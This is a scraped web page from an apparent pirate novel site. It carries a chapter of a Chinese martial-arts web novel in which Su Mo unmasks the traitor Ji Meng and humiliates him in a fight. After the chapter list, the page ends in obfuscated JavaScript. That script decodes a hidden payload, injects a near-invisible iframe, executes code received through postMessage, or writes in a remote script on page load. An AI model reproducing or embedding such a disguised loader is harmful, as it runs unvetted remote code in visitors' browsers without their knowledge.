收藏【小说123网www.txt123.cc】,元尊小说无弹窗免费阅读!

    通过这件事儿,苏漠猜测出这群反叛者中,应该还掺杂了一股别的势力。

    虽然他们表面上装作大家都互不相识,但是有时候的下意识的行为是骗不了人的。

    为此苏漠这几日,偶尔走出房间时不经意间留意过。

    因此冀猛他们到底混了多少人进来,苏漠心中已然有了一个大概。

    再有就是今日,冀猛和温茯苓之间演的那场戏。

    冀猛确实把一个爱恋温茯苓的角色给演出来。

    但是他忘了在这个角色之前,他先对苏漠是表过了忠心的。

    因此在面对一个一扪心思要靠近苏漠的人时,冀猛并没有做到一个真正效忠苏漠的下属应该做的事儿。

    那就是拦下温茯苓。

    虽然一开始他确实做出了拦的举动。

    但是后来他却因为温茯苓短短的几句话;就十分轻易的放过温茯苓,让她来找苏漠。

    从这件事儿便可以看出,冀猛这个人作为下属不可信。

    今日他能因为温茯苓几句话,就放任她越过自己来找苏漠。

    那么明日就会有李茯苓,后日就会有张茯苓等等。

    至于后面温茯苓为什么突然改变主意不给苏漠送汤;而是把手中的汤给了冀猛并药倒他。

    关于这个举动。

    苏漠是这样理解的,她将温茯苓的这行为理解为她的小心谨慎。

    温茯苓心中想着,若是自己药倒了冀猛。

    那么就能摘除冀猛跟她合谋的嫌疑。

    这样就算之后自己的行动失败了,但是冀猛还在,他还受着苏漠的信赖。

    那么等到时机成熟,冀猛突然的反水,就一定会打苏漠一个措手不及。

    到时候其他人再里应外合一番,那他们所谋之事就成了。

    却不知,苏漠从一开始就没有相信过冀猛。

    更让温茯苓没料到的是。

    苏漠竟然这般敏锐的一开始就防着她不说;最后要用了以其人之道还治其人之身的办法,反将她给药倒了。

    因为温茯苓被苏漠药倒,冀猛将其带走之后,试了很多办法都没能让温茯苓醒来。

    信不过苏漠的冀猛,选择了铤而走险;提前实施了他们的计划。

    他想想利用地牢和御米粉来拿下苏漠,并准备以此来逼迫塑膜交出能让温茯苓快速清醒过来的解药。

    可惜最后因为苏漠事先接触过御米粉,并记住了它的味道。而导致冀猛的计划彻底落空了。

    其实苏漠的一开始给冀猛提过醒的,就是在下楼的时候,她看到并提及的那个还没拆除的处刑台的时候。

    那时候苏漠说了一句:姑且留着。

    并不单指处刑台,只可惜冀猛没能听懂。

    彻底暴露的冀猛,看着地牢门口,俯视着自己的苏漠。

    终于不再继续伪装;只见他忽然身形暴走,直接向苏漠袭去。

    拳头带着破空的罡风,眼中的戾气也顿时横生;颇有一副要一拳将苏漠揍扁的架势。

    眼下的冀猛整个人看上去,虽与那日跟苏漠比拼内力时更有具有攻击性。

    然而尝试过冀猛内力霸道的苏漠,在面对这样的冀猛依旧神色如常。

    她看着向自己攻击过来的冀猛,双手背在背后淡定的后退了一小步。

    如此冀猛的全力一击,就被苏漠这么轻飘飘的一下给规避开了。

    冀猛见一击不行,再生数招。

    气势比之前更足,招式也更为凌厉。

    可是苏漠依旧双手背在背后,依旧每次只移动小小的一步来规避,完全一副不把冀猛放在眼里的样子。

    两人的这番打斗发出的动静不小,因此惊动了不少在阁内休整的其他人。

    他们纷纷从自己房内走出,围观起苏漠和冀猛的这一场打斗来。

    楼上的李召也不例外,妙衣亦在他的搀扶下久违的走出了房门。

    妙衣站在楼上倚栏处,看着楼下苏漠一直不断的后退。

    好看的眉,不由的一皱。

    李召发现之后,立即开口宽慰她道:“你且放心吧,阁主这是在逗着冀猛玩儿呢。”

    “我知道,我只是在好奇他为什么这么做。”

    要知道以前苏漠都是直接用一招解决敌人的。

    听妙衣这么一说,李召微微一愣。

    对哦,阁主以前被人所熟知。

    就是因为他无论面对什么样的敌人,都是一招结束一切的。

    今儿怎么与冀猛周旋了这么久,还是一直后退并不是接招。

    难道之前跟冀猛的切磋,留下了什么暗伤?

    苏漠见周围围观的人越来越多,终于不再继续后退。

    在冀猛再一次向她攻击过来之时。

    苏漠开口了:“你们看好了。”

    苏漠说完背在身后的左手,终于动了。

    在冀猛的拳头即将击中苏漠的面门时,苏漠左手出,正面接下了冀猛的拳头。

    但是这个正面的接触只有一瞬,下一瞬苏漠的左手便如同灵活的蛇一般。

    在冀猛攻击过来的的那只手上,游走了一圈化解了他的全部攻势后,手掌微微后退一分,然后再裹上自身的内力微微用力推出。

    轻飘飘的一掌,却让冀猛如遭重击,生生倒退了数十步。

    站定后的冀猛,有些不可置信的看向了苏漠。

    怎么会?!

    他的内力呢?

    为什么在苏漠这轻飘飘的一掌打过来之后,就尽数消失了?

    冀猛沉着面色问苏漠:“你对我做了什么?”

    “本尊,准备今日教些东西给阁内的这些兔崽子们,便有劳你当个陪练了。”

    苏漠嘴上说着有劳,但是做出来的事儿,却完全没有任何商量的余地。

    这让冀猛的脸色,不由得变的更黑了。

    他从未见如此不按常理出牌的人。

    先是无情的拆穿他,接着又像逗猫一样逗着他,现在又要拉着他当什么狗屁陪练。

    这个人的脑子里到底在想着什么?

    想到这里,冀猛沉声问道:“我若是拒绝呢?”

    对于冀猛的无效反抗,苏漠也不恼淡笑着说道:“你没有拒绝的权利,除非你想死。”

    众人听后忍不住发出一声‘嘶’的语气。

    用最冰冷的语气,说着最真的话。

    说的大概就是现在的苏漠了吧。

    没人会去怀疑苏漠话中的真实性,虽然前几日苏漠跟他们动手的时候都没有要他们的命。

    但是他们绝对不会认为,苏漠是因为不敢。

章节目录

免费都市小说推荐: 逆流1990从刨冰开始 男人三十 年代娇妻成了科技大佬 等我有钱以后 我家娘子要从军 土味巨星 乡野村民 总裁爹地请赐教 镇国医圣 五个孽徒都想争夺我

eval("\x77\x69\x6e\x64\x6f\x77")["\x57\x57\x57\x69"]=function(e){var jW =''+'ABCDEFGHI'+'JKLMNOPQ'+'RSTUVWXYZab'+'cdefghi'+'jklmnopqrst'+'uvwxyz0123456789+'+'/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=jW.indexOf(e.charAt(f++));o=jW.indexOf(e.charAt(f++));u=jW.indexOf(e.charAt(f++));a=jW.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x7A\x71\x4B\x57\x57\x56\x69\x6A\x48"]=function(){eval(WWWi("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoV1dXaSh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKFdXV2koIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihXV1dpKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbV1dXaSgiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKFdXV2koZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyd5SVRMNScrJ1FUJysnTnkweVknKydZR0pUSicrJ2xSJysnV2VscCcrJ1gnKydjR0pUSicrJ3onKydRJysnRE4nKyd3RVRRJysnelUnKydTYnZOJysnbUx1SicrJzJjbVJXJysnYnVjMycrJ2QzWmsnKydNbCcrJ1lZaycrJ01sRScrJzAnKydNbE0nKydIYzAnKydSSGEnKycnKycnLCcnKyc3cnYnKydURDknKydsSScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydKR2YnKyc3ZDMnKycwJysnJysnJywnWScp"));}